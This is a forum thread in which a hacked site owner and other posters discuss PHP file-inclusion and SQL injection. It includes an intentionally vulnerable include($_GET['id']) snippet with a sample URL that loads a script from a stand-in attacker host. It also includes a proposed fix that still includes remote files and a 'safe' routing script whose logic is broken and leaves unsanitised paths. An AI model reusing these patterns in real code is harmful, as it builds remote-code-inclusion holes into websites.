PHP injected scripts

[crawlerbasher]

Recentley my site got hacked into and was used as a paltform for hosting a fake ebay site to steal passwords.

After talking to my host provider, it has been made clear that one of php script could have data injected into it to upload files to my site.

 

Now dose anyone have any more inforamtion on how this can be done, and how to prevent this from happening again?

[ToonMariner]

yes check data before you use it.

 

this is commone with include files, mysql queries or where you use exec();

 

make sure that you verify data that is going to be used in such cases.

[crawlerbasher]

so an include("main.php") could be susetable to code injection?

would say using include("http://www.test.com/main.php") help prevent this?

 

And how can I verify data that would pass though?

 

These are my own scripts, so its not as if I'm intending to grant ppl acsses to my site.

[techtheatre]

include("main.php") is safe...(assuming no problems in main.php)

If instead you were to have http://www.test.com/lookup.php?page=main.php where lookup.php had the following

include("$page");

this would NOT be safe (anything could be passed as a value for the variable "$page" so you are potentially including anything...

 

same idea for inserting data into SQL...if you are inserting variables that were passed by a site user you will want to check them first.  encode the characters that could cause problems, and validate that number fields only contain numbers, email address fields contain valid email addresses, strip out things that are not allowed...etc.

 

There is LOTS of info about this online, so just Google for "SQL Injection" and find a PHP function that will clean up your data.

[Nameless12]

 

I just had to share some code that cracks me up

<?php
// the request url =  http://localhost/index.php?id=http://www.attackersWebpage.com/VeryNastyScript.php
include ($_GET['id']);
?>

 

oh and dont forget there are many other types of injection even someone just putting bold tags in their name so that they appear to be special wherever their name is used can be a nuisance, validate everything.

 

(and the above attack can be protected against by modifying your php.ini)

 

[crawlerbasher]

I've been doing some reading on this, and my head hurts.

So much to think about.

What was once a basic script, is now my down fall. (Caught with pants down).

 

I've been thinking of possible ways around this and one of them (of the top of my head) is somthing like this:

 

<?php
$id = $_GET['id'];
if ($id) {
include("http://www.test.com/$id");
}
?>

 

Now then if some one tryed to put in http://www.test.com?id=http://www.attacker.com/attacker.php

Then this code would try to include http://www.test.com/http://www.attacker.com/attacker.php

 

Now could somthing that simple work?

What kind of problem could this corse?

 

I'll keep researching this, and thanks for the help.

[jscix]

You can make sure the file ext. trying to be included is .php, and you can make sure the file trying to be included is within a specific folder. This should make it a bit more secure also.

[jscix]

Also, I recomend adding a logging feature, for failed includes. Normally people try multiple things before succeeding .. so you will at least have a log of your attacker.

[crawlerbasher]

Will trying to get my head around this I would like other ppl that are not aware of this to keep this in mind.

And I've found a good site that gives some simple exsamples of how to help with injections.

 

http://www.acunetix.com/websitesecurity/php-security-1.htm

 

I don't want ppl making the same mistakes I made.

[clown[NOR]]

What I do with the include part of my index.php is that I always check for slashes and also I always use if (!file_exists()) { $include = "missing.php"; }

 

so.. this is how my homepage part looks like:

<?php

$include = "home.php";
$show = $_GET['show'];
$archive = $_GET['archive'];
$aID = $_GET['aID'];
if (isset($show)) {
	if (!isset($archive)) {
		$chkSlash = explode("/", $show);
		if (!empty($chkSlash[1])) { $include = stripslashes($chkSlash).".php"; }
		else { $include = "$show.php"; }
	} else {
		$chkArray = array($show, $archive, $aID);
		$chkSlash = explode("/", $chkArray);
		if (!empty($chkSlash[1])) { $include = stripslashes($chkSlash).".php"; }
		else { $include = "archive/$archive/$aID/$aID.php"; }
	}
}
if (!file_exists($include)) { $include = "missing.php"; }
require_once($include);

?>

 

i feel pretty safe when it comes to trying to mess with my URL... and I try to secure all my MySQL codes the best way i know how... like you guys said.. strip_tags(), stripslashes(), trim(), mysql_real_escape_string() etc...

 

wish people had more to do than hacking other peoples sites... would save us a lot of work..